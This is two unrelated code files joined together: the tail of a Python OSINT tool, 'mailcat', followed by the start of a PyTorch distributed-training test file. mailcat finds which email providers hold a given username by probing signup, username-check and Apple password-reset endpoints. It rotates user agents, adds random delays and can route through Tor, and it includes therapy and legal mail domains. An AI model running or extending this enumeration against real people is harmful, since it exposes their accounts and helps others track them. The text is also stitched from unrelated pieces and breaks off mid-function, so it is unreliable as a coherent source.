# print('\n'.join(["[+] Success with {}@{}".format(target, posteod) for posteod in posteoLst]))
except Exception as e:
pass
# print(e)
except Exception as e:
pass
# print(e)
sleep(random.uniform(0.5, 1.1))
if fastmailSucc:
result["Fastmail"] = fastmailSucc
return result
def startmail(target, req_session_fun) -> Dict: # TOR
result = {}
startmailURL = "https://mail.startmail.com:443/api/AvailableAddresses/{}%40startmail.com".format(target)
headers = {"User-Agent": random.choice(uaLst),
"X-Requested-With": "1.94.0"}
sreq = req_session_fun()
try:
chkStartmail = sreq.get(startmailURL, headers=headers, timeout=10)
if chkStartmail.status_code == 404:
result["StartMail"] = "{}@startmail.com".format(target)
except Exception as e:
pass
return result
def kolab(target, req_session_fun) -> Dict:
result: Dict[str, List] = {}
kolabLst = ["mykolab.com",
"attorneymail.ch",
"barmail.ch",
"collaborative.li",
"diplomail.ch",
"freedommail.ch",
"groupoffice.ch",
"journalistmail.ch",
"legalprivilege.ch",
"libertymail.co",
"libertymail.net",
"mailatlaw.ch",
"medicmail.ch",
"medmail.ch",
"mykolab.ch",
"myswissmail.ch",
"opengroupware.ch",
"pressmail.ch",
"swisscollab.ch",
"swissgroupware.ch",
"switzerlandmail.ch",
"trusted-legal-mail.ch",
"kolabnow.com",
"kolabnow.ch"]
''' # old cool version ;(
kolabURL = "https://kolabnow.com:443/cockpit/json.php"
headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": "https://kolabnow.com/cockpit/signup/individual",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"}
try:
kolabStatus = sreq.post(kolabURL, headers=headers)
print(kolabStatus.status_code)
if kolabStatus.status_code == 200:
for kolabdomain in kolabLst:
kolabPOST = {"validate": "username",
"accounttype": "individual",
"username": target,
"domain": kolabdomain,
"_action_": "/signup/validate"}
try:
chkKolab = sreq.post(kolabURL, headers=headers, data=kolabPOST)
if chkKolab.status_code == 200:
kolabJSON = chkKolab.json()
if kolabJSON['errors']:
suc = "This email address is not available"
if kolabJSON['errors']['username'] == suc:
print("[+] Success with {}@{}".format(target, kolabdomain))
except Exception as e:
pass
sleep(random.uniform(1, 3))
except Exception as e:
#pass
print e
'''
kolabURL = "https://kolabnow.com/api/auth/signup"
headers = {"User-Agent": random.choice(uaLst),
"Referer": "https://kolabnow.com/signup/individual",
"Content-Type": "application/json;charset=utf-8",
"X-Test-Payment-Provider": "mollie",
"X-Requested-With": "XMLHttpRequest"}
sreq = req_session_fun()
kolabStatus = sreq.post(kolabURL, headers={"User-Agent": random.choice(uaLst)}, timeout=10)
if kolabStatus.status_code == 422:
kolabpass = randstr(12)
kolabsuc = "The specified login is not available."
for kolabdomain in kolabLst:
kolabPOST = {"login": target,
"domain": kolabdomain,
"password": kolabpass,
"password_confirmation": kolabpass,
"voucher": "",
"code": "bJDmpWw8sO85KlgSETPWtnViDgQ1S0MO",
"short_code": "VHBZX"}
try:
# chkKolab = sreq.post(kolabURL, headers=headers, data=kolabPOST)
chkKolab = sreq.post(kolabURL, headers=headers, data=json.dumps(kolabPOST), timeout=10)
print(chkKolab.text)
if chkKolab.status_code == 200:
kolabJSON = chkKolab.json()
if kolabJSON["errors"]["login"] == kolabsuc:
# print("[+] Success with {}@{}".format(target, kolabdomain))
pass
else:
if kolabJSON["errors"]:
print(kolabJSON["errors"])
except Exception as e:
pass
return result
def bigmir(target, req_session_fun) -> Dict:
result = {}
bigmirSucc = []
bigmirMail = ["i.ua", "ua.fm", "email.ua"]
sreq = req_session_fun()
for maildomain in bigmirMail:
try:
bigmirChkJS = "https://passport.i.ua/js/free.js?15908746259240-xml"
headers = {
'Pragma': 'no-cache',
'Origin': 'https://passport.i.ua',
'User-Agent': random.choice(uaLst),
'Content-Type': 'application/octet-stream',
'Referer': 'https://passport.i.ua/registration/'
}
bm_data = "login={}@{}".format(target, maildomain)
bigmirChk = sreq.post(bigmirChkJS, headers=headers, data=bm_data, timeout=10)
if bigmirChk.status_code == 200:
exist = "'free': false"
if "'free': false" in bigmirChk.text:
bigmirSucc.append("{}@{}".format(target, maildomain))
sleep(random.uniform(2, 4))
except Exception as e:
pass
if bigmirSucc:
result["Bigmir"] = bigmirSucc
return result
def tutby(target, req_session_fun) -> Dict: # Down
result = {}
smtp_check = code250('tut.by', target)
if smtp_check:
result['Tut.by'] = smtp_check[0]
return result
sreq = req_session_fun()
try:
target64 = str(base64.b64encode(target.encode()))
tutbyChkURL = "https://profile.tut.by/requests/index.php"
headers = {
'Pragma': 'no-cache',
'Origin': 'https://profile.tut.by',
'User-Agent': random.choice(uaLst),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://profile.tut.by/register.html',
'X-Requested-With': 'XMLHttpRequest'
}
tutbyData = f"action=lgval&l={target64}"
tutbyChk = sreq.post(tutbyChkURL, headers=headers, data=tutbyData, timeout=10)
if tutbyChk.status_code == 200:
exist = '[{"success":true}]'
if exist == tutbyChk.text:
result['Tut.by'] = '{}@tut.by'.format(target)
# print("[+] Success with {}@tut.by".format(target))
pass
except Exception as e:
pass
return result
def xmail(target, req_session_fun) -> Dict:
result = {}
sreq = req_session_fun()
xmailURL = "https://xmail.net:443/app/signup/checkusername"
headers = {"User-Agent": random.choice(uaLst),
"Accept": "application/json, text/javascript, */*",
"Referer": "https://xmail.net/app/signup",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Connection": "close"}
xmailPOST = {"username": target, "firstname": '', "lastname": ''}
try:
xmailChk = sreq.post(xmailURL, headers=headers, data=xmailPOST, timeout=10).json()
if not xmailChk['username']:
result["Xmail"] = "{}@xmail.net".format(target)
except Exception as e:
pass
return result
def ukrnet(target, req_session_fun) -> Dict:
result = {}
ukrnet_reg_urk = "https://accounts.ukr.net:443/registration"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"DNT": "1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"}
sreq = req_session_fun()
try:
get_reg_ukrnet = sreq.get(ukrnet_reg_urk, headers=headers, timeout=10)
if get_reg_ukrnet.status_code == 200:
ukrnet_cookies = sreq.cookies.get_dict()
if ukrnet_cookies:
ukrnetURL = "https://accounts.ukr.net:443/api/v1/registration/reserve_login"
ukrnetPOST = {"login": target}
ukrnetChk = sreq.post(ukrnetURL, headers=headers, cookies=ukrnet_cookies, json=ukrnetPOST, timeout=10)
if ukrnetChk.status_code == 200:
if not ukrnetChk.json()['available']:
result["UkrNet"] = "{}@ukr.net".format(target)
except Exception as e:
pass
return result
def runbox(target, req_session_fun) -> Dict:
result = {}
runboxSucc = []
runboxLst = ["mailhost.work",
"mailhouse.biz",
"messagebox.email",
"offshore.rocks",
"rbox.co",
"rbox.me",
"rbx.email",
"rbx.life",
"rbx.run",
"rnbx.uk",
"runbox.at",
"runbox.biz",
"runbox.bz",
"runbox.ch",
"runbox.co",
"runbox.co.in",
"runbox.com",
"runbox.dk",
"runbox.email",
"runbox.eu",
"runbox.is",
"runbox.it",
"runbox.ky",
"runbox.li",
"runbox.me",
"runbox.nl",
"runbox.no",
"runbox.uk",
"runbox.us",
"xobnur.uk"]
headers = {"User-Agent": random.choice(uaLst),
"Origin": "https://runbox.com",
"Referer": "https://runbox.com/signup?runbox7=1"}
sreq = req_session_fun()
for rboxdomain in runboxLst:
data = {"type": "person", "company": "", "first_name": "", "last_name": "", "user": target,
"userdomain": "domainyouown.com", "runboxDomain": rboxdomain, "password": "",
"password_strength": "", "email_alternative": "", "phone_number_cellular": "",
"referrer": "", "phone_number_home": "", "g-recaptcha-response": "",
"h-captcha-response": "", "signup": "%A0Set+up+my+Runbox+account%A0",
"av": "y", "as": "y", "domain": "", "accountType": "person", "domainType": "runbox",
"account_number": "", "timezone": "undefined", "runbox7": "1"}
chkRunbox = sreq.post('https://runbox.com/signup/signup', headers=headers, data=data, timeout=5)
if chkRunbox.status_code == 200:
if "The specified username is already taken" in chkRunbox.text:
runboxSucc.append("{}@{}".format(target, rboxdomain))
sleep(random.uniform(1, 2.1))
if runboxSucc:
result["Runbox"] = runboxSucc
return result
def iCloud(target, req_session_fun) -> Dict:
result: Dict[str, List] = {}
domains = [
'icloud.com',
'me.com',
'mac.com',
]
for domain in domains:
email = f'{target}@{domain}'
sreq = req_session_fun()
headers = {
'User-Agent': random.choice(uaLst),
'sstt': 'zYEaY3WeI76oAG%2BCNPhCiGcKUCU0SIQ1cIO2EMepSo8egjarh4MvVPqxGOO20TYqlbJI%2Fqs57WwAoJarOPukJGJvgOF7I7C%2B1jAE5vZo%2FSmYkvi2e%2Bfxj1od1xJOf3lnUXZlrnL0QWpLfaOgOwjvorSMJ1iuUphB8bDqjRzyb76jzDU4hrm6TzkvxJdlPCCY3JVTfAZFgXRoW9VlD%2Bv3VF3in1RSf6Er2sOS12%2FZJR%2Buo9ubA2KH9RLRzPlr1ABtsRgw6r4zbFbORaKTSVWGDQPdYCaMsM4ebevyKj3aIxXa%2FOpS6SHcx1KrvtOAUVhR9nsfZsaYfZvDa6gzpcNBF9domZJ1p8MmThEfJra6LEuc9ssZ3aWn9uKqvT3pZIVIbgdZARL%2B6SK1YCN7',
'Content-Type': 'application/json',
}
data = {'id': email}
check = sreq.post('https://iforgot.apple.com/password/verify/appleid', headers=headers, data=json.dumps(data), allow_redirects=False, timeout=5)
if check.headers and check.headers.get('Location', '').startswith('/password/authenticationmethod'):
if not result:
result = {'iCloud': []}
result['iCloud'].append(email)
return result
def duckgo(target, req_session_fun) -> Dict:
result = {}
duckURL = "https://quack.duckduckgo.com/api/auth/signup"
headers = {"User-Agent": random.choice(uaLst), "Origin": "https://duckduckgo.com", "Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-site", "Te": "trailers", "Referer": "https://duckduckgo.com/"}
data = {
"code": (None, "01337"),
"user": (None, target),
"email": (None, "mail@example.com")
}
sreq = req_session_fun()
try:
checkDuck = sreq.post(duckURL, headers=headers, data=data, timeout=5)
# if checkDuck.json()['error'] == "unavailable_username":
if "unavailable_username" in checkDuck.text:
result["DuckGo"] = "{}@duck.com".format(target)
except Exception as e:
pass
return result
def ctemplar(target, req_session_fun) -> Dict:
result = {}
sreq = req_session_fun()
ctURL = "https://api.ctemplar.com/auth/check-username/"
ctJSON = {"username": target}
headers = {"User-Agent": random.choice(uaLst),
"Accept": "application/json, text/plain, */*",
"Referer": "https://mail.ctemplar.com/",
"Content-Type": "application/json",
"Origin": "https://mail.ctemplar.com"}
try:
chkCT = sreq.post(ctURL, headers=headers, json=ctJSON)
if chkCT.status_code == 200:
ct_exists = chkCT.json()['exists']
if ct_exists:
result["CTemplar"] = "{}@ctemplar.com".format(target)
except Exception as e:
pass
return result
def hushmail(target, req_session_fun) -> Dict:
result = {}
hushDomains = ["hushmail.com", "hush.com", "therapyemail.com", "counselingmail.com", "therapysecure.com", "counselingsecure.com"]
hushSucc = []
sreq = req_session_fun()
hush_ts = int(datetime.datetime.now().timestamp())
hushURL = "https://secure.hushmail.com/signup/create?format=json"
ref_header = "https://secure.hushmail.com/signup/?package=hushmail-for-healthcare-individual-5-form-monthly&source=website&tag=page_business_healthcare,btn_healthcare_popup_signup_individual&coupon_code="
hush_UA = random.choice(uaLst)
hushpass = randstr(15)
for hushdomain in hushDomains:
# hushpass = randstr(15)
hush_ts = int(datetime.datetime.now().timestamp())
headers = {"User-Agent": hush_UA,
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Hush-Ajax-Start-Time": str(hush_ts), "X-Requested-With": "XMLHttpRequest",
"Origin": "https://secure.hushmail.com", "Referer": ref_header,
"Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
data = {"hush_customerid": '', "hush_exitmethod": "GET",
"skin": "bootstrap311", "hush_cc_country": '',
"trial_mode": '', "parent": '', "parent_code": '',
"coupon_code": '', "form_token": "6e1555a603f6e762a090e6f6b885122f_dabaddeadbee",
"__hushform_extra_fields": '', "hush_username": target, "hush_domain": hushdomain,
"hush_pass1": hushpass, "hush_pass2": hushpass,
"hush_exitpage": "https://secure.hushmail.com/pay?package=hushmail-for-healthcare-individual-5-form-monthly",
"package": "hushmail-for-healthcare-individual-5-form-monthly",
"hush_reservation_code": '', "hush_customerid": '', "hush_tos": '', "hush_privacy_policy": '',
"hush_additional_tos": '', "hush_email_opt_in": '', "isValidAjax": "newaccountform"}
try:
hushCheck = sreq.post(hushURL, headers=headers, data=data, timeout=5)
if hushCheck.status_code == 200:
if "'{}' is not available".format(target) in hushCheck.json()['formValidation']['hush_username']:
hushMail = "{}@{}".format(target, hushdomain)
hushSucc.append(hushMail)
except Exception as e:
pass
sleeper(hushDomains, 1.1, 2.2)
if hushSucc:
result["HushMail"] = hushSucc
return result
####################################################################################
def show_banner():
banner = r"""
,-. ^
( ( _,---._ __ / \
) ) .-' `./ / \
( ( ,' `/ /:
\ `-" \'\ / |
. , \ \ / |
/ @ ,'-`----Y |
( ; : :
| .-. _,-' | /
| | ( ( | /
) ( \ `.___________:/
`..' `--' :mailcat:
"""
for color, part in zip(range(75, 89), banner.split('\n')[1:]):
print("\033[1;38;5;{}m{}\033[0m".format(color, part))
sleep(0.1337)
def print_results(checker, target, req_session_fun, is_verbose_mode):
checker_name = checker.__name__
if is_verbose_mode:
print(f'Running {checker_name} checker for {target}...')
res = checker(target, req_session_fun)
try:
if not res:
if is_verbose_mode:
print(f'No results for {checker_name}')
res = {}
except Exception as e:
print(f'Error while checking {checker_name}: {e}')
return
for provider, emails in res.items():
print(f'\033[1;38;5;75m{provider}: \033[0m')
if isinstance(emails, str):
emails = [emails]
for email in emails:
print(f'* {email}')
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Mailcat",
)
parser.add_argument(
'-p',
'--provider',
action="append",
metavar='<mail providers names>',
dest="providers",
default=[],
help="Specify one or more mail providers by name",
)
parser.add_argument(
"username",
nargs='*',
metavar="USERNAME",
help="One username to search emails by",
)
parser.add_argument(
'-l',
'--list',
action="store_true",
default=False,
help="List all the supported providers",
)
parser.add_argument(
'-s',
'--silent',
action="store_true",
default=False,
help="Hide wonderful mailcat intro animation",
)
parser.add_argument(
'-v',
'--verbose',
action="store_true",
default=False,
help="Verbose output about search progress.",
)
parser.add_argument(
'--tor',
action="store_true",
default=False,
help="Use Tor where you need it",
)
args = parser.parse_args()
all_checkers = [gmail, yandex, proton, mailRu,
rambler, tuta, yahoo, outlook,
zoho, eclipso, posteo, mailbox,
firemail, fastmail, startmail,
bigmir, tutby, xmail, ukrnet,
runbox, iCloud, duckgo, hushmail,
ctemplar] # -kolab -lycos(false((( )
if not args.silent:
show_banner()
if args.list:
print('Supported email providers: ')
print(' ' + ', '.join(map(lambda f: f.__name__, all_checkers)))
target = args.username
if len(target) != 1:
print('Please, specify one username to search!')
sys.exit(1)
else:
target = target[0]
if "@" in target:
target = target.split('@')[0]
uaLst = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"]
if args.providers:
pset = set(args.providers)
checkers = [c for c in all_checkers if c.__name__ in pset]
if not checkers:
print(f'Can not find providers {", ".join(args.providers)}')
else:
checkers = all_checkers
if args.tor:
req_session_fun = via_tor
else:
req_session_fun = simple_session
threads = []
for checker in checkers:
t = threading.Thread(target=print_results, args=(checker, target, req_session_fun, args.verbose))
t.start()
threads.append(t)
for t in threads:
t.join()
|
test_c10d_common.py
|
import copy
import os
import sys
import tempfile
import threading
import time
import unittest
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
self._spawn_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
